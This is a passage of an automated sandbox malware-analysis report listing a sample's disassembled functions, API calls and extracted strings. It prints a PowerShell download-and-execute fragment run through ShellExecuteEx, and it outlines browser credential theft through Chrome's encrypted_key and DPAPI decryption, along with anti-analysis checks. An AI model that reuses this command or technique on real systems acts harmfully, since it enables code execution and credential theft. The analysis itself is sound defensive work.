                                                                                    • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                    • String ID:
                                                                                    • API String ID: 634100517-0
                                                                                    • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                                    • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                                                    • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                                                    • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                                                    Function 02D27167 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.MSVCRT ref: 02D27186
                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02D27401,00000000,00420BA8,00000000,00000000), ref: 02D271B4
                                                                                      • Part of subcall function 02D26E37: strlen.MSVCRT ref: 02D26E48
                                                                                      • Part of subcall function 02D26E37: strlen.MSVCRT ref: 02D26E6C
                                                                                    • VirtualQueryEx.KERNEL32(02D27574,00000000,?,0000001C), ref: 02D271F9
                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D27401), ref: 02D2731A
                                                                                      • Part of subcall function 02D27047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 02D2705F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                    • String ID: @
                                                                                    • API String ID: 2950663791-2766056989
                                                                                    • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                    • Instruction ID: fd40c59311cc5ca9b5d48c97b578beb1ab987477724f52480a490aa458448da4
                                                                                    • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                                                    • Instruction Fuzzy Hash: CD51F3B1A00119ABEB14CF98D981AEFB7B6FF98304F108519F915A7340D734EE15CBA5
                                                                                    Function 004069B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: *n@$*n@
                                                                                    • API String ID: 1029625771-193229609
                                                                                    • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                                                    • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                                                    • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                                                    • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                                                    Function 02D249E7 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrcat.KERNEL32(?,0064A30C), ref: 02D24A42
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D24A68
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D24A87
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D24A9B
                                                                                    • lstrcat.KERNEL32(?,0064A284), ref: 02D24AAE
                                                                                    • lstrcat.KERNEL32(?,?), ref: 02D24AC2
                                                                                    • lstrcat.KERNEL32(?,0064A2C8), ref: 02D24AD6
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D28FF7: GetFileAttributesA.KERNEL32(00000000,?,02D11DBB,?,?,0042565C,?,?,00420E1F), ref: 02D29006
                                                                                      • Part of subcall function 02D247D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02D247E7
                                                                                      • Part of subcall function 02D247D7: RtlAllocateHeap.NTDLL(00000000), ref: 02D247EE
                                                                                      • Part of subcall function 02D247D7: wsprintfA.USER32 ref: 02D2480D
                                                                                      • Part of subcall function 02D247D7: FindFirstFileA.KERNEL32(?,?), ref: 02D24824
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2540262943-0
                                                                                    • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                                                    • Instruction ID: 5337104457dfc60701aa1ade774a0fc46577361cf2605e2f602c742830e48c34
                                                                                    • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                                                    • Instruction Fuzzy Hash: BE3195B6940218ABCB10FBF0DC84EE9737AEB68704F4045C9B64596180DE749B8DCFB5
                                                                                    Function 00412C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                                                    Strings
                                                                                    • ')", xrefs: 00412CB3
                                                                                    • <, xrefs: 00412D39
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    • API String ID: 3031569214-898575020
                                                                                    • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                                                    • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                                                    • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                                                    • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                                                    Function 02D11487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 02D114A5
                                                                                    • __aulldiv.LIBCMT ref: 02D114BF
                                                                                    • __aulldiv.LIBCMT ref: 02D114CD
                                                                                    • ExitProcess.KERNEL32 ref: 02D114FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 3404098578-2766056989
                                                                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                    • Instruction ID: 2887fee0c836d5bed552d8ea155d543ad0f3bf32cc84ebe913f97b972c4440d7
                                                                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                    • Instruction Fuzzy Hash: 83014BB0941308BAEF10DBD0DC89B9DBAB9AB44B09F208458E709B67C0D7B49945CB65
                                                                                    Function 02D1A077 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcmp.MSVCRT(?,00421264,00000003), ref: 02D1A094
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D20CC7: memset.MSVCRT ref: 02D20E83
                                                                                      • Part of subcall function 02D20CC7: lstrcat.KERNEL32(?,00000000), ref: 02D20E9C
                                                                                      • Part of subcall function 02D20CC7: lstrcat.KERNEL32(?,00420D7C), ref: 02D20EAE
                                                                                      • Part of subcall function 02D20CC7: lstrcat.KERNEL32(?,00000000), ref: 02D20EC4
                                                                                      • Part of subcall function 02D20CC7: lstrcat.KERNEL32(?,00420D80), ref: 02D20ED6
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • memcmp.MSVCRT(?,00421114,00000003), ref: 02D1A116
                                                                                    • memset.MSVCRT ref: 02D1A14F
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 02D1A1A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                                                    • String ID: @
                                                                                    • API String ID: 1977917189-2766056989
                                                                                    • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                                                    • Instruction ID: 28276c569d9992df2555437f21ec8308340e0a4db9e63302dcccbb19df4a874a
                                                                                    • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                                                    • Instruction Fuzzy Hash: 02615A30600258EBCB18EFA4DD95FED77B2EF54304F408118E909AB690DB74AE09CF61
                                                                                    Function 00410D90 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strtok_s.MSVCRT ref: 00410DB8
                                                                                    • strtok_s.MSVCRT ref: 00410EFD
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s$lstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 348468850-0
                                                                                    • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                                                    • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                                                    • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                                                    • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                                                    Function 00409CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                      • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                      • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                      • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                      • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                      • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                      • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                      • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                      • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                      • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                    • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                                                      • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                                                      • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                                                      • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                                                      • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                                                    • String ID: $"encrypted_key":"$DPAPI
                                                                                    • API String ID: 3731072634-738592651
                                                                                    • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                                                    • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                                                    • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                                                    • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                                                    Function 02D2CDA0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValidmemset
                                                                                    • String ID:
                                                                                    • API String ID: 703783727-0
                                                                                    • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                                                    • Instruction ID: 8516d235f666c73c55f83e143c763eb446f4683df26e841c74d3e3addc7fd180
                                                                                    • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                                                    • Instruction Fuzzy Hash: 3231D520A292B19AD725CF74889437DBFA49B25318F0A41ABD881CF3D1C369CC49C761
                                                                                    Function 02D26B87 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemTime.KERNEL32(?), ref: 02D26BD3
                                                                                    • sscanf.NTDLL ref: 02D26C00
                                                                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D26C19
                                                                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02D26C27
                                                                                    • ExitProcess.KERNEL32 ref: 02D26C41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Time$System$File$ExitProcesssscanf
                                                                                    • String ID:
                                                                                    • API String ID: 2533653975-0
                                                                                    • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                                                    • Instruction ID: f1ad978e3822a92217a98bbf55ed9685633675beab30facbe0d4eb11503deb7a
                                                                                    • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                                                    • Instruction Fuzzy Hash: 0C21EDB5D04218AFCF08EFE4D9459EEB7BAFF58304F04952DE406A3250EB349608CBA5
                                                                                    Function 02D28067 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2809E
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D280A5
                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 02D280C5
                                                                                    • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 02D280E6
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02D280F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3225020163-0
                                                                                    • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                    • Instruction ID: 8a8039f243166a3fa07d00a7cfb043ca8053f9946ea46465296370eaef0093bf
                                                                                    • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                    • Instruction Fuzzy Hash: 10116DB5A84219BBD710CFD4DD4AFABB7B9EB45701F104219F615A7280C7746804CBA1
                                                                                    Function 00417E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,02E32770,00000000,00020119,?), ref: 00417E5E
                                                                                    • RegQueryValueExA.ADVAPI32(?,02E3A4F0,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3466090806-0
                                                                                    • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                    • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                                                    • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                                                    • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                                                    Function 02D27987 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2799B
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D279A2
                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,02D27920), ref: 02D279C2
                                                                                    • RegQueryValueExA.ADVAPI32(02D27920,00420AAC,00000000,00000000,?,000000FF), ref: 02D279E1
                                                                                    • RegCloseKey.ADVAPI32(02D27920), ref: 02D279EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3225020163-0
                                                                                    • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                                                    • Instruction ID: edecfb0f795a99a83c989b19916f8da936b096ca258598319a66df5faa4f8f1d
                                                                                    • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                                                    • Instruction Fuzzy Hash: FB01FFB9A80308BFEB10DFE4DC4AFAEB7B9EB48705F104559FA05A7280D6759A048F51
                                                                                    Function 00419260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • StrStrA.SHLWAPI(02E39C38,?,?,?,0041140C,?,02E39C38,00000000), ref: 0041926C
                                                                                    • lstrcpyn.KERNEL32(0064AB88,02E39C38,02E39C38,?,0041140C,?,02E39C38), ref: 00419290
                                                                                    • lstrlenA.KERNEL32(?,?,0041140C,?,02E39C38), ref: 004192A7
                                                                                    • wsprintfA.USER32 ref: 004192C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpynlstrlenwsprintf
                                                                                    • String ID: %s%s
                                                                                    • API String ID: 1206339513-3252725368
                                                                                    • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                    • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
